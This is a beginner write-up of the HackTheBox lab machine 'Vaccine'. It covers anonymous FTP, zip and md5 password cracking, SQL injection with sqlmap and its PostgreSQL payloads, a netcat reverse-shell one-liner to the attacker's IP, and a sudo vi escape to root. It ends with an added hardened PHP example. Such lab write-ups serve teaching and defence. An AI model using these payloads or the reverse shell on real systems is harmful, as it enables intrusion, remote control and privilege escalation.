HackTheBox | Vaccine

FarisArch
6 min read · Oct 29, 2021

If you think October is only the spooky month, well you’re wrong! October is also known as Cyber Security Month!

To celebrate the month, HackTheBox renewed their Starting Point, which is a path for beginners who want to start learning to hack. And I must say it is very well made.

HackTheBox! (Literally)

The path has three tiers: Tier 0, Tier 1 and lastly Tier 2. What you’re going to read is a box from Tier 2 called Vaccine.

Vaccine Room rated as Easy.

Enumeration

First step is always enumeration! Enumeration is the key to victory.

NMAP

PORT   STATE SERVICE REASON  VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.31
| Logged in as ftpuser
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNsSORVFGkIbgItDm/mxmyPhpsIJihXV8y4CQiMTWGdEVQatXNIlXX0yGLZ4JFtPEX9rOGAp/eLZc0mGJtDyuyQ=
| 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvk132UscLPAfaZyZ2Av54rpw9cP31OrloBE9v3SLW
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  • Lots of information to process, but don’t worry, take your time! Time is always on our side.
  • Now let’s choose a rabbit hole to go into.

FTP

  • From the NMAP scan, we can see that it says anonymous login is allowed.
  • That means we can log into the File Transfer Protocol (FTP for short) server without valid credentials.
  • When logged in, we can list out the files and directories inside the server.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
  • A backup file? Let’s get that first and look around for more. If there is nothing else, let’s get out of this server!
  • Trying to unzip the file, but it’s password protected! Crap.

John The Ripper

As hackers we always find a way to break something.

  • We can use a utility from John The Ripper (JTR for short) called zip2john, which extracts the zip file’s password hash into a format that john can crack.
  • Now we need a wordlist to crack it against; we’ll be using the famous rockyou.txt.
  • After a while we get a result!

backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

Looks like the password was 741852963.

  • Unzipping the file, we get index.php and style.css.
  • We’re more interested in the source code of index.php.
  • Looking around the source, we find PHP handling the login function of a site.
<?php
session_start();
// Only handle the form when both fields were posted
if(isset($_POST['username']) && isset($_POST['password'])) {
    // Username must be admin and the md5 of the password must match a fixed hash
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
        $_SESSION['login'] = "true";
        header("Location: dashboard.php");
    }
}
?>

So what it’s doing is: if the POST username and password variables are set, it checks that the username is admin and that the md5 hash of the password matches 2cb42f8734ea607eefed3b70af13bbd3.

  • So there is a login page on this server somewhere.
  • We could try to brute-force the password, but that’s not working smart.
  • Since we have the hash of the password it wants, we can crack it to see what the value is.
  • We’ll be using crackstation for this, and we get it in a second.
admin:qwerty789

Web

  • Visiting the URL, we have a login page for MegaCorp.
  • Let’s use the credentials we found earlier.
  • And we’re able to login.
  • We’re presented with a list of tables of cars and there is a search box.
  • Since it’s fetching the data from somewhere, is it possibly fetching from a database?
  • Let’s try a single quote in the search to see what happens.
ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^

Okay so we have a possible SQL injection in our hands.

Exploit

  • We could do it manually, but it’ll take some time, so we’ll use a tool made specifically for this called Sqlmap.
  • What I do when dealing with SQL injections is save the request using Burp Suite, which is a Man In The Middle (MITM for short) tool, and send it to Sqlmap. It reduces errors and it’s way easier.
Burp is a tool created by PortSwigger
GET /dashboard.php?search=3 HTTP/1.1
Host: 10.129.142.249
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.129.142.249/dashboard.php?search=2
Cookie: PHPSESSID=i8jmu9jjje1t69tjt27ouk1mu7
Upgrade-Insecure-Requests: 1

Now click save item.

  • So now we don’t have to supply any cookies or anything else to Sqlmap when performing the request.

$ sqlmap -r ~/sql --batch --os-shell

  • The parameter search is indeed vulnerable to SQL injection. The DBMS in use is PostgreSQL.
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=3' AND (SELECT (CASE WHEN (4656=4656) THEN NULL ELSE CAST((CHR(86)||CHR(89)||CHR(99)||CHR(101)) AS NUMERIC) END)) IS NULL-- gQNp

Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=3' AND 1330=CAST((CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC)-- FumX

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=3';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=3' AND 5698=(SELECT 5698 FROM PG_SLEEP(5))-- QKVO

By supplying --os-shell, Sqlmap will give us a shell back if it’s possible.

  • And we do get a shell, but it’s very unstable.
  • Before going further, let’s get a better shell through a reverse shell.

os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.31 9001 >/tmp/f

  • Now we have a better shell on port 9001.

Post-Exploit

Now we’re in, now what?

  • We are the user postgres, and we’re in the sudo group somehow.
  • Try to run sudo, but we need a password.
  • Always try the passwords that we found in case there is any password reuse. But in this case there is not.
  • We do find a private key in .ssh, but we don’t have a password to log in with.
  • Now, when you don’t know what to do, run linpeas. Linpeas is a Linux enumeration tool.

Internal Enumeration

  • We have a few interesting findings:
/home/
/home/ftpuser/ftp/backup.zip
/home/simon/.bash_history
/root/
/var/lib/postgresql/.bash_history
/var/lib/postgresql/.psql_history
  • All the .bash_history files are empty, sadly.
  • Now, since we know there is a site, let’s check /var/www/html.
  • We haven’t checked dashboard.php, so let’s check the source code of that.
  • We find out how it’s connecting to the database to fetch data.
try {
    // Connection string with the database password hard-coded in the page
    $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}

Hard coding credentials in source code isn’t really a great idea.
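The three weak spots found so far, the md5 login check in index.php, the search term glued into the SQL in dashboard.php, and the database password hard-coded next to it (plus the missing HttpOnly flag from the nmap scan), are fixed below in one hardened version. This is an added example written for this writeup, not code from the box; the hash placeholder and the use of PGPASSWORD are assumptions.

```php
<?php
// Added example: hardened login + search for the MegaCorp site on this box.
// Assumption: the bcrypt hash below is a placeholder; generate the real one with
// password_hash('<chosen password>', PASSWORD_DEFAULT) and keep it out of the web root.
const ADMIN_HASH = '$2y$10$REPLACE_WITH_PASSWORD_HASH_OUTPUT';

// Session cookie without HttpOnly was flagged by nmap; set it before session_start().
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

function login(string $username, string $password): bool {
    // password_verify() handles the salt and compares in constant time, unlike
    // comparing md5() of the input against a fixed string.
    return $username === 'admin' && password_verify($password, ADMIN_HASH);
}

function connectDb() {
    // No password in the conninfo string: libpq reads it from the PGPASSWORD
    // environment variable (or ~/.pgpass), so it no longer lives in dashboard.php.
    if (getenv('PGPASSWORD') === false) {
        throw new RuntimeException('PGPASSWORD is not set');
    }
    // pg_connect() returns false on failure rather than throwing, so check it.
    $conn = pg_connect('host=localhost port=5432 dbname=carsdb user=postgres');
    if ($conn === false) {
        throw new RuntimeException('database connection failed');
    }
    return $conn;
}

function searchCars($conn, string $search): array {
    // The wildcards go into the bound value, not the SQL text, so a quote in
    // $search is plain data: the input that produced the error on this box
    // simply becomes a literal search for an apostrophe.
    $result = pg_query_params($conn, 'SELECT * FROM cars WHERE name ILIKE $1', ['%' . $search . '%']);
    if ($result === false) {
        throw new RuntimeException('query failed');
    }
    return pg_fetch_all($result) ?: [];
}

if (isset($_POST['username'], $_POST['password'])) {
    if (login($_POST['username'], $_POST['password'])) {
        session_regenerate_id(true);   // fresh session id after a successful login
        $_SESSION['login'] = 'true';
        header('Location: dashboard.php');
        exit;
    }
}
```

With this in place, the single-quote probe from the Web section returns zero rows instead of a PostgreSQL error, and the hash stored in the file is useless to anyone who reads it.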

  • Possible credentials:

postgres:P@s5w0rd!

  • Now let’s try sudo -l again.
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • Okay, first things first, let’s SSH into the server for a more stable shell.

Privilege Escalation

  • Okay, we know that we can run sudo on /bin/vi /etc/postgresql/11/main/pg_hba.conf.
  • If you’re unaware, vi is a command line text editor.
  • One thing that people don’t realize is that you can run commands while in vi (cool huh).
  • To do this, first let’s open up the file using sudo.

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

  • Now we’re in vi.
  • Now hit the escape key (ESC). The command bar at the bottom is used for vi commands and all that cool stuff.
  • To run commands, first type : followed by !, then whatever command you want. I’ll be spawning a root shell.
:!/bin/bash
  • And we should be root now!
